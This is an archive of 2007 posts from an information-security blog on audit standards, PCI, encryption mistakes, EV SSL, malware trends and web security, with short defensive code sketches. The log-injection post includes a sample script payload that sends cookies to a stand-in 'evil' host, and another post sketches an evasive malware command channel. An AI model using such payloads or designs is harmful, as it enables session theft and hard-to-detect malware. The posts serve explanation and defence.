I've recently found some time to take a look at the new Cobit 4.0. I was glad to see that ISACA aligned Cobit with other documents, like ISO17799 and ITIL. It was a very important change, as organizations usually deploy their processes following best practice guides like ISO17799 and ITIL and then have their IT environment audited by someone using Cobit.

This will keep people from trying to use Cobit as implementation guidance, which is definitely not the purpose of the standard. It will also force auditors to learn more about the other standards, as in the past I've found some auditors who suffered from "non-Cobit blindness".

Audit Quality and Freakonomics

I was recently reading the excellent documents from Ross Anderson on Information Security Economics. A good reading tip for those interested in the subject is the famous Freakonomics book.

After reading Anderson's texts I realized that the reason for the lower quality of external audits that I've been seeing is strictly economic. There are no incentives for an audit company to actually deliver good audits! For those who hire a big audit company, the main deliverable is the final report, usually needed to comply with things like SOX. A "clean" report is the best thing they can receive, as they will be compliant with regulations and won't have to spend money on fixing audit issues. Naturally, audits that find fewer issues will be preferred by the market. Meanwhile, the audit companies that run more thorough processes will suffer the opposite effect. Is it possible to build something into those regulations to avoid this?

Saturday, March 3, 2007

Those five mistakes over encryption

Anton Chuvakin liked that I called his article on encryption mistakes a "masterpiece". But it really is!

In fact, encryption mistakes are in focus now that PCI is getting stronger. Everybody is looking for ways to encrypt card data, and it's exactly at this moment that they are most vulnerable to vendor pitches. I'm seeing some "PCI in a box" products being sold, and they are usually related to encryption.

Another problem with encryption shows up when you're talking with vendors of IT products outside security. Try, for example, asking a software salesman how his software deals with user IDs and passwords. I'm almost certain that you'll hear "relax, they are encrypted". I know that salesmen aren't the best people to answer those questions, but I feel a sadistic and hard-to-control desire to ask "How?" (in fact, I always do). Their answers always contain one or more of the mistakes listed by Dr. Chuvakin. My favorites, so far, are:

"With a 256 BYTES key and 3DES" (even if it was bits... :-) )
"Using a known secure method called RSA" (are they really encrypting passwords with RSA???)
"I can't tell you, it's so secure it's secret" (men, it's so funny to hear that!)

Now, where are the security guys from these companies? Are they working only on their corporate policies? Even if some of these cases are just a salesman trying to lure you with a bad answer, some of them really are bad encryption implementations. Some software houses still have nobody responsible for building security into their products and development processes. This makes the work of the security departments of the companies buying their software much harder, as they sometimes end up struggling with business people to keep that crappy software out of their business. And sometimes that crappy software is the best (or even the only) solution in terms of business functionality.

Another aspect really annoys me about those answers: if those guys are saying these things to me without thinking twice, it's because someone else asked the question and BOUGHT the answer. How can a CSO or someone similar be satisfied with an answer like that? Encryption tends to be seen as too technical a subject for CSOs to learn about. No, we need to know at least the basics of it. It's not that hard to identify those five mistakes. If you suspect a vendor has already thrown an answer like those at you and you bought it, go look for a basic introduction to encryption. Even by reading some pages on Wikipedia you'll be able to identify most of those cases.

The CISSP body of knowledge contains all the information needed by a CSO to know the encryption basics. If you already obtained your certification or are planning to get it, take your books and read that part again with a different look. Now you know when you'll need that information.

Friday, March 2, 2007

Encryption Mistakes, masterpiece by Chuvakin

Anton Chuvakin wrote a masterpiece about the most common mistakes regarding data encryption. They are:

- Not encrypting when it's easy and accepted
- Creating your own encryption
- "Hard-coding" secrets
- Storing keys with the encrypted data
- Not handling data recovery (or "where are those f* keys????")

I think that every professional responsible for PCI compliance projects needs to read it. Encryption is not that silver bullet you're looking for (in fact, I hope you're not looking for one!)
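For contrast, here is a minimal sketch of getting the basics right with the Python cryptography package; it's an illustration of avoiding the mistakes above, not a recommendation of a specific product:

```python
from cryptography.fernet import Fernet

# A vetted authenticated-encryption recipe instead of home-grown crypto (mistake #2),
# with a generated key rather than a hard-coded one (mistake #3).
key = Fernet.generate_key()
# In real life, store this key in a separate keystore/HSM, never next to the
# encrypted data (mistake #4), and back it up so recovery works (mistake #5).

cipher = Fernet(key)
token = cipher.encrypt(b"4111 1111 1111 1111")
print(cipher.decrypt(token))  # b'4111 1111 1111 1111'
```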

Thursday, March 1, 2007

Storm Worm and some old predictions

In 2005, at the CNASI conference, I presented a PoC trojan that uses the authentication of a valid user web session to inject its own transactions. I showed that even some strong authentication systems could be fooled by it. I'll reproduce that code in our Black Hat presentation as part of the botnet trends, in this specific case in their "feature" sets.

It was interesting to see that the Storm worm is doing something very similar to what I showed back then, injecting its content into webmail and blog systems and getting around CAPTCHA tests. Together with the content being presented by Jose Nazario at BH DC, this is another of our predictions showing up in new malware.

Wednesday, February 28, 2007

I wanna be a Security Evangelist

A few months after mentioning on his podcast that he wanted to be a Security Evangelist, Martin McKeay was hired by StillSecure for this position. Hey security companies out there, this is my dream job too! :-)

One important thing to say: Martin made it by deserving it. Congratulations. I hope to achieve the same someday.

Monday, February 26, 2007

Features and the security point of view

The SANS ISC diary today mentions a JavaScript event present in today's browsers called onUnload(). What does it do?

The browser will execute it when the user is leaving that page. Very interesting feature, isn't it?

Well, not so interesting when you start looking with the eyes of security, as the post on the diary does. Those pop-up filled websites can prevent the user from leaving them just by executing a location=self.location when onUnload fires. Incredibly simple and effective (at least for them). They can also pretend that the user is really leaving when that's not actually happening, opening room for a lot of phishing attacks.

This is a very good example of how a software feature looks when you put the security goggles on. You need to do that every time your developers are building new code. Do you have anyone thinking about the side effects of the new features in your software?

A final remark about the onUnload() function: it can, in fact, help with some security aspects. Just remember that almost no users leave a web application by clicking the "Log Out" button/link. You can force the logout procedure by detecting the user leaving the website with the onUnload() function. At least one good thing in it for us.

Thoughts on MS Security Intelligence Report

It's old news, but only now have I found time to comment on the MS Security Intelligence Report.

Some of its findings confirmed my opinions about the Brazilian security field.

First, banks here are quite a bit more advanced in fighting phishing and malware aimed at their clients than in other countries. The report shows that password stealers and keyloggers are a very common threat in Brazil. This has been happening for years, which made our banks migrate their online banking systems from simple password authentication to much more complex security systems. Today it would be very hard to find a bank here that is not using a password for Internet services separate from the debit card PIN, on-screen keyboards, anti-malware plugins and OTP cards. We should really think about presenting all those things at the regular security events around the world. It's funny to see that so few people know about this.

There is also information about the use of Instant Messaging as a social engineering attack vector. Putting information leakage and productivity issues aside, it shows that blocking IM seems to be less necessary than it seemed before. If you consider that Microsoft Messenger updates can also be published through the regular patching systems (WSUS, Microsoft Update), it isn't something that really must be forbidden. If your business likes to use it, keep it working.

Another interesting data point is the normalized view of Windows versions with detected malware. Windows XP SP2 is responsible for only 3.7% of the cases. It clearly shows that even before Vista, the latest security improvements from Microsoft were having an effect.

Log Injection

I've just read an interesting paper from SIFT about log injection. It reminded me of something that I find very interesting, though not very new. I remember a very good presentation from the Sensepost guys at Black Hat US 2004.

They showed a number of ways to fool people running attack tools against their network. Among other things, they mentioned how easy it was to exploit tools that generate HTML reports. I wonder how deep this can go. There are lots of security tools that generate beautiful HTML reports. Are they safe from this kind of attack? And what about current log analysis and SIM/SIEM systems: are they prepared to deal with log injection attacks? I wouldn't bet too much on it.
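The defensive side is almost trivial, which makes it stranger that report generators skip it. A minimal sketch of escaping log content before it lands in an HTML report:

```python
import html

def render_report_row(log_line: str) -> str:
    """Escape log content so injected markup renders as text, not as HTML/script."""
    return f"<tr><td>{html.escape(log_line)}</td></tr>"

# A hostile log entry trying to run script in the analyst's browser:
evil = 'GET /x?q=<script>document.location="http://evil/"+document.cookie</script>'
print(render_report_row(evil))  # the <script> tag comes out as harmless text
```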

Fix Users

I've been away from the blog for a few days (lots of work to do before Black Hat), but I took note of this little article from Dark Reading.

This is a discussion about the value and results of training users. I have mixed feelings about it. I really believe that training users must be part of a security program. However, I must also admit that there are limits to the effectiveness of this measure. After all, they are human. You can make 80% of your users avoid problems, but 20% will certainly look for them even after months of training.

In the DR discussion, RSnake mentions that you need to keep harmful things far from the users. I agree with him, especially about local admin rights. A big problem is that in most organizations there are lots of people with special privileges on their workstations, mostly IT staff. These are the most dangerous, as they tend to have dangerous tools installed and access to critical information. They also think that they don't need security training, unlike the regular business user, who knows that there is risk and that he/she doesn't know how to avoid it.

I think the problem of user actions is like a big hole being closed from two sides. One side is the least privilege and default deny concepts; we need to take them seriously. The other is security awareness. Neither side is enough to close the gap alone, but pushing both together will achieve the goal.

Friday, February 23, 2007

Black Hat Europe - Here we go!

I've finally found time to write about my new challenge: speaking at BH Europe!

I'm working on a botnet trends review with André Fucs and Victor Pereira, my old friends in security research. We have already built some interesting things to show there, and I hope some others will be ready for the presentation too. It's our first international presentation, so we are a bit anxious about it. There will be a presentation from Jose Nazario at Black Hat DC next week, and it seems that he'll show that some of the things we will be indicating as trends are already being detected. Good to know that we are on the right track.

Monday, February 12, 2007

Modern malware

I've just read a very interesting analysis of a new malware sample on SANS ISC. They've found a malware that downloads a password-protected zip file from an HTTP location. The contents of this package are encrypted. The malware also uses a certificate to establish SSL connections to the IRC control servers, avoiding detection by network IDSes. Very interesting.

However, this one still doesn't solve the major obstacles to malware spreading. It tries to use a simple outbound TCP connection to talk to the servers, which is usually blocked by well-configured firewalls. It would be far more difficult to block if it used SSL HTTP connections through a common proxy setup. The malware could search Google for a specific string (or a dynamic string generated by some sort of pseudo-random number generator), dynamically finding the URLs where it could download its commands.

Another interesting thing in that analysis is the note from the ISC handler saying that most antivirus products are still not able to detect this malware. He mentions a defense-in-depth strategy, which is absolutely right. The use of anomaly detection is also an important feature for fighting these new malware threats. I'd like to see how the SONAR technology from Symantec would react to this particular case.

Tuesday, February 6, 2007

Other view about anomaly-based detection

I am a huge fan of anomaly-based detection, as opposed to the old and ineffective signature-based approach. I'm always saying that about IDS and antivirus. However, it's always good to see different opinions and information. I found this article very interesting, as it shows some problems related to anomaly-based detection. It's very valuable reading.

ROI

Last week, in an Executive Board meeting, I heard a CEO complaining about the IT budget requests he was receiving that tried to justify their expenses by showing an ROI. He mentioned that almost all of them were wrong, as they were based on cost avoidance and not cost reduction. Although none of them were related to security, I found his comments extremely pertinent to the famous ROSI discussion. I'm glad to see that my personal opinion about it is aligned with what the CEO of the company I work for thinks.

Security monitoring - NSM and Logs

I really like to work with logs when the subject is security monitoring. In fact, my entire master's thesis is based on log analysis. However, Richard Bejtlich is right about some weaknesses of doing it based only on logs. He is quite right in saying that the absence of logs does not confirm integrity. He proposes the use of network sensors and other tools and procedures (what he calls Network Security Monitoring, NSM) to complement the security monitoring process. It's a very good concept.

Silver Bullet Podcast

The "Silver Bullet" podcast, from Gary McGraw, is very good, and you probably already know about it. Imagine now an episode with:

  • Bill Pugh, Professor at University of Maryland, static analysis for finding bugs
  • Li Gong, GM at Microsoft, MSN in China
  • Marcus Ranum, CSO of Tenable Network Security, security products trainer
  • Avi Rubin, Professor at Johns Hopkins, electronic voting security
  • Fred Schneider, Professor at Cornell, trustworthy computing
  • Greg Morrisett, Professor at Harvard, dependent type theory
  • Matt Bishop, Professor at UC Davis, computer security
  • Dave Wagner, Professor at Berkeley, software security and electronic voting
This is very, very worth listening to!

Thursday, February 1, 2007

EV SSL - Was it really necessary?

There is a new security magic solution! It's called Extended Validation SSL certificates.

For me, this is extremely dumb. First, do you really know what kind of security an SSL certificate can provide?

SSL certificates can't provide security by themselves. The certificate's role during an SSL session is to provide a way to ensure the identity of the peers, normally only the server. Certificates are digitally signed by a company that is trusted by both parties in the communication.

What? Who is this 3rd party that I trust? I don't remember saying that I trust anybody to do that!

These companies go through a process that gets them pre-installed in the most used browsers on the market. When you install IE or Firefox, for example, you are implicitly trusting these companies to verify the identity of the websites that you access through "https". This is that old "lock picture in the corner" thing: if it's there, it means that the identity of the site you are accessing was verified by one of those companies (well, in fact it's not so simple, you have the choice to trust whoever you want, but let's keep it simple). If you click on that lock you will see the digital certificate that the site is presenting to you, with some information about the organization that acquired it.
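You can pull that same information programmatically. A small sketch using Python's standard library plus the cryptography package (the hostname is just an example):

```python
import ssl
from cryptography import x509

# Fetch the certificate the site presents during the SSL handshake
pem = ssl.get_server_certificate(("www.example.com", 443))
cert = x509.load_pem_x509_certificate(pem.encode())

print("Subject:", cert.subject.rfc4514_string())  # who the cert was issued to
print("Issuer: ", cert.issuer.rfc4514_string())   # the CA you are trusting
print("Expires:", cert.not_valid_after)
```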

These companies that you trust are the Certificate Authorities. Before issuing a certificate, they need to check the identity of the organization requesting it for its web site. This verification process varies from one CA to another.
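
For the curious, here is a minimal sketch (in modern Python, using the standard ssl module) of what the browser does behind that lock: open a TLS connection, validate the server's certificate against the pre-installed trusted roots, and read who the certificate was issued to and by. The host is just an example.

```python
# Inspecting the certificate behind the "lock icon".
import socket
import ssl

host = "www.example.com"
ctx = ssl.create_default_context()  # loads the trusted root CA bundle

with socket.create_connection((host, 443)) as sock:
    with ctx.wrap_socket(sock, server_hostname=host) as tls:
        cert = tls.getpeercert()  # only available after validation succeeds

print("subject:", cert["subject"])  # the organization that owns the site
print("issuer: ", cert["issuer"])   # the CA you are implicitly trusting
```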

That lock thing, however, was not enough to stop phishing sites. So some companies decided to create a "certificate on steroids", called EV-SSL. This new certificate can only be issued by CAs after a more thorough identity verification process, to prevent company A from obtaining a certificate for its site in the name of company B.

Besides that, new browsers show more information about the web site being visited, as well as turning the address bar green. That's nice. A company wanting to use it on its site just needs to replace its current SSL certificate with an EV-SSL certificate, paying an additional fee and going through the verification process.

OK, so EV-SSL brings more security in two ways:

- Better identity verification before the certificate is issued
- More information about the site being visited presented by the browser

Hey, did anybody notice that there was no need to create a new kind of certificate (and make companies pay more) to do that??? Why didn't the CAs just start following stricter verification processes for the regular SSL certificates? I bet that if Microsoft started threatening to remove those CAs from IE's Trusted Root CAs unless they improved their processes, it would have the same effect. The green bar and the extra identity information could be shown for any SSL certificate too.

But then the CAs wouldn't be earning a few hundred extra bucks from every company with an SSL website...

Friday, January 26, 2007

PCI, PCI, PCI! OK, but are they focusing on the right things?

Reading this, it's almost clear that PCI really is the standard of the moment. However, I'm still impressed by how the security professionals and vendors dealing with it seem to be missing the point about what is really important and needs to be done first.

One of the main security concepts is risk management. Since you can't solve all your security problems, you should start by solving the worst ones. PCI, however, doesn't mention anywhere a risk assessment aimed at credit card data. There are 12 requirements, all with the same importance and at the same level. The result is that companies are struggling with security solutions without properly assessing whether they are solving the worst problems in their control framework.
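
Here is a minimal sketch of the kind of prioritization I'm talking about: score each finding by likelihood times impact and address the worst first. The findings and numbers are invented for illustration; a real assessment would obviously be richer than this.

```python
# Toy risk ranking: (finding, likelihood 0-1, impact 1-10), all invented.
findings = [
    ("unencrypted backup tapes",       0.3,  9),
    ("SQL injection in payment app",   0.8, 10),
    ("weak passwords on test systems", 0.6,  4),
]

for name, likelihood, impact in sorted(
        findings, key=lambda f: f[1] * f[2], reverse=True):
    print(f"{likelihood * impact:5.1f}  {name}")  # fix the top of this list first
```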

Everybody is talking about encryption. Encrypt all transmissions, encrypt data at rest, etc. However, has anybody verified whether encryption would have prevented the main data leaks of the last few years? Except for those backup tapes and laptops, I really doubt it.

PCI should become a more modern framework, with a phased approach: assess first to identify the major risks, then define a security strategy. It can list the minimal points that need to be covered, but it's essential to include a prioritization and planning phase. PCI enforces the existence of specific controls; their appropriateness and priority, however, are not considered.

Version 1.1 is, in fact, better than 1.0, as it introduced the concepts of compensating controls and application security. I still think it should say more about security processes. The standard mentions a "security policy". Why not a Security Program?

Tuesday, January 23, 2007

Best Practices?

This post from Anton Chuvakin, commenting on a post from another blog, is one of those to hang on the wall.

The post he comments on has a point when it says that there are lots of people trying to follow best practices and standards instead of doing real security. I think it's partially right. If the process lacks intelligence, it won't work anyway. And I agree that some "best practices" are not so best.

But Chuvakin is entirely right to say that using checklists is a good approach when previously there was no approach at all.

They also agree on something that I have always fought for wherever I worked: "real security is a creative act". Yes, this is not a monkey job! A lot of people believe that perfect security means creating the perfect checklist and handing it to less qualified (and cheaper) workers. It's not exactly like that. I've seen with my own eyes the difference between the same checklist being used by competent and not-so-competent people. Totally different results.

Some people say this is making a mystery of the job, using "talent" to make it look bigger than it really is. I think they are exaggerating and underestimating the problem of doing real security. Without intelligence and knowledge you can't go far. But it's not only that. A standard or "best practice" is just like any other specialist's tool, like the scalpel for the plastic surgeon. Handled by a specialist, it can work miracles. Handled by the unskilled, it does only harm.

Symantec and SONAR

Some time ago Symantec bought a company called Whole Security, which had a very interesting malware detection product that wasn't signature based (it was behaviour based). That was so long ago that I thought Symantec was simply going to kill the product. But now there is news that they are putting the Whole Security technology into Norton Antivirus under a new name, SONAR. Very good, I really want to see this thing working!

They are watching us!

After reading the first part of The Pragmatic CSO I'm convinced that Mike Rothman is just like Scott Adams: THEY ARE WATCHING US!!!

Last week's Daily Dilbert strips show this power of Mr. Adams here and here.

Two parts of The P-CSO caught my eye today. The first was one of those "addicted CSO" dialogues that Mike writes so well (you can check it in the introduction, which is freely downloadable from the site); it has a part where the CSO mentions the increasing difficulty he faces getting his investments approved, and the time he spends with auditors, meetings and assembling business cases. That's sooooo real!!

The other was a note about "Shadow IT", those systems created by business units when Corporate IT doesn't address their needs. This is also very common; I find a couple of them every day. A good thing about having business support is that people start calling you when those things are being born, so you have the chance to make them start right.

Sunday, January 21, 2007

New MS VPN Protocol - or new backdoor covert channel?

I've just read in Network World that MS is developing a new VPN protocol that works over HTTP, to avoid the known problems of making tunnels work through networks with NAT, firewalls and proxies in place.

I don't question the need for this as far as the tunnel functionality goes. SSL VPNs grew so much exactly to address these issues; in fact, the NW article mentions that it will be an SSL VPN. However, I can already see problems with malware using it as a covert channel to communicate with its master. Being an encrypted protocol, the chances of detection by network monitoring will be very low.

But why worry about it if we already have this feature in other products? Because putting it in the OS will make it easier for malware authors to use. I'm a very bad programmer, but the very little I know is enough to call simple Windows APIs from easy programming languages like VB.

Not that I'm saying it's a bad thing to do. It's common to create features that can be used for both good and evil. As security professionals, however, we need to think about how we will deal with the bad part. Disabling the protocol through GPO settings could be one option.
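
On the detection side, even without decrypting anything there are behavioural signals worth watching. Here is a hedged sketch of one heuristic: flag long-lived outbound TLS connections that upload unusually large volumes, the typical shape of a covert tunnel. The flow records and thresholds below are hypothetical; real data would come from NetFlow or proxy logs.

```python
# Toy covert-tunnel heuristic over invented flow records:
# (destination, duration in seconds, bytes sent by the client).
flows = [
    ("203.0.113.10:443", 35_000, 220_000_000),  # day-long, heavy upload
    ("198.51.100.7:443",     12,      48_000),  # ordinary web browsing
]

for dst, duration, bytes_out in flows:
    if duration > 3_600 and bytes_out > 50_000_000:
        print(f"possible covert tunnel to {dst}")
```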

Friday, January 19, 2007

Compliance solution in-a-box

My job of commenting on security matters is much easier now that I'm reading Mike Rothman's news. From today's posting:

"There is no compliance "solution"
Maybe I'm just grumpy, but the anonymous CJ Kelly is annoying me. Yesterday it was her jumping on the printing security risk bandwagon and today it's making some silly statements about compliance. Let's get one thing straight. There is no compliance SOLUTION. It's not something you can buy, not for any price. You need a strong security program as the foundation, and a way to document what you do and why. That's Step 12 of the P-CSO process. She points to Ogren's post (which is right) about the fact that much of the regulation has had little impact on the base level of security of an organization. And it's because a lot of organizations feel no pain because enforcement is a joke. But to say that the issue with compliance is the vendors not bringing forward complete solutions makes my blood boil. Just another example of someone wanting to solve a problem by open up the checkbook. Sorry CJ, it doesn't work like that.
http://www.computerworld.com/blogs/node/4392"

One thing that's quite funny is watching security box vendors claim their product is "100% SOX Ready". WTF does that mean??? That, or something like "with my product, being SOX compliant is easy". Wow, I didn't know they were selling silver bullet boxes.

PCI is another standard suffering from the same evil. PCI has 12 requirements, from access control to data encryption, yet you can see companies offering vulnerability scanners as the final solution for PCI compliance. My biggest worry is that if they keep pushing these lies, somebody is probably buying them. What kind of CSOs do we have out there?

Tuesday, January 16, 2007

Security Theater

Bruce Schneier mentioned in his blog this post on Slashdot about security theater. I've seen some discussions about it, mainly around the point of removing people from physical security checkpoints. But what really caught my eye was the comment about different audit procedures for code from new releases versus patches.

Has anyone conducted a study to check whether code auditing is a viable security control for companies that are not software vendors? I mean, almost all big companies that don't sell software have internal development teams providing maintenance and new features for the software they use. Does auditing the code for security vulnerabilities bring enough security to compensate for its cost?

I believe the answer to this question depends on several variables, like the amount of change in the code, the exposure of the software to motivated and skilled attackers, and the existence of easier ways to attack the business process the software supports.

Without an analysis of these aspects, I think a code auditing process can end up being more expensive than accepting the risk, or even become just more security theater.
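
Putting the same reasoning into a back-of-the-envelope formula: audit the code only if the expected loss it prevents exceeds what the audit costs. Every number below is an assumption for illustration.

```python
# Toy cost-benefit test for a code auditing program; all figures invented.
p_exploit = 0.10       # yearly chance a vulnerability gets exploited
loss = 2_000_000       # expected loss if it does ($)
reduction = 0.50       # fraction of that risk the audit removes
audit_cost = 250_000   # yearly cost of auditing every change ($)

expected_benefit = p_exploit * loss * reduction  # $100,000 here
print("auditing pays off" if expected_benefit > audit_cost
      else "cheaper to accept the risk - or it's just security theater")
```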

Friday, January 12, 2007

Classification products

Sometimes we get so excited about an idea that we forget to check whether someone has had it first. Well, I was thinking about dusting off my programming books to build something, but suddenly I decided to check Google first.

Here is exactly what I had in mind: tools to help classify information.

Thursday, January 11, 2007

Smart defense in depth example

We can see a very good example of Defense in Depth being used at Microsoft by reading this note from Michael Howard.

They are not only training the developers to produce better code, they are also using tools to keep the residual mistakes from becoming vulnerabilities. Smart.

Tuesday, January 9, 2007

About Web Application Security

Imperva recently published a very good article about web application security.

The article shows numbers on the type and severity of the vulnerabilities usually found in web applications, as well as how the situation has evolved over the last four years.

The article is a very good resource for those who don't have a regulatory driver like PCI to push web application security in their companies. Even for those fighting the "penetrate and patch vs. security built in" war, the text is very important, as it shows the very high number of re-tests that still found critical vulnerabilities and the very small number that found no vulnerabilities at all.

The only problem with the article is that it comes from a company that sells application firewalls. Even with all the interesting data presented, the conclusion seems too product-driven. If one tries to use it to justify developer training and security throughout the application life cycle, he may end up getting budget only for another miracle box.

Monday, January 8, 2007

Very very good blog

Just this weekend I stumbled upon Mike Rothman's blog. After reading just two days of his postings, I'm already planning to buy his PDF book, "The Pragmatic CSO". First, because I already have good feelings about anything that uses the word "pragmatic". Second, his postings are so intelligent that I'm really willing to see what advice he has prepared for a CSO like me.

Today he made a brilliant observation about the discussion of which kind of threat is more important, internal or external. I usually end up reading and researching more about internal threats because I find the problems involved more interesting, but he makes the point that it doesn't matter whether the threat is internal or external, only whether it can reach your business systems. One of his phrases: "Enough of these ridiculous insider vs outsider delineations. Protect your damn business systems and the nomenclature will work itself out." Really loved that.

I'll keep reading it. The format of his comments ("top blog postings") is exactly what I intended to do here. Unfortunately I have to spend a few extra minutes whenever I write in English, so I haven't been able to keep the postings coming. I have to change that this year.

Saturday, January 6, 2007

Quote of the week

I've just started reading Mike Rothman's blog, but it seems to be an incredible source of good insights and information. He has already won my quote-of-the-week award with this gem about the vulnerability severity levels we usually see in advisories:

"The only severity score that is important is the one you come up with after figuring out if you are exposed."

Perfect. I'm almost convinced that the 97 bucks for his book are worth it :-)

He also mentioned the Dilbert strip from 31/12. I've been facing weeks with dialogues like that since last month :-(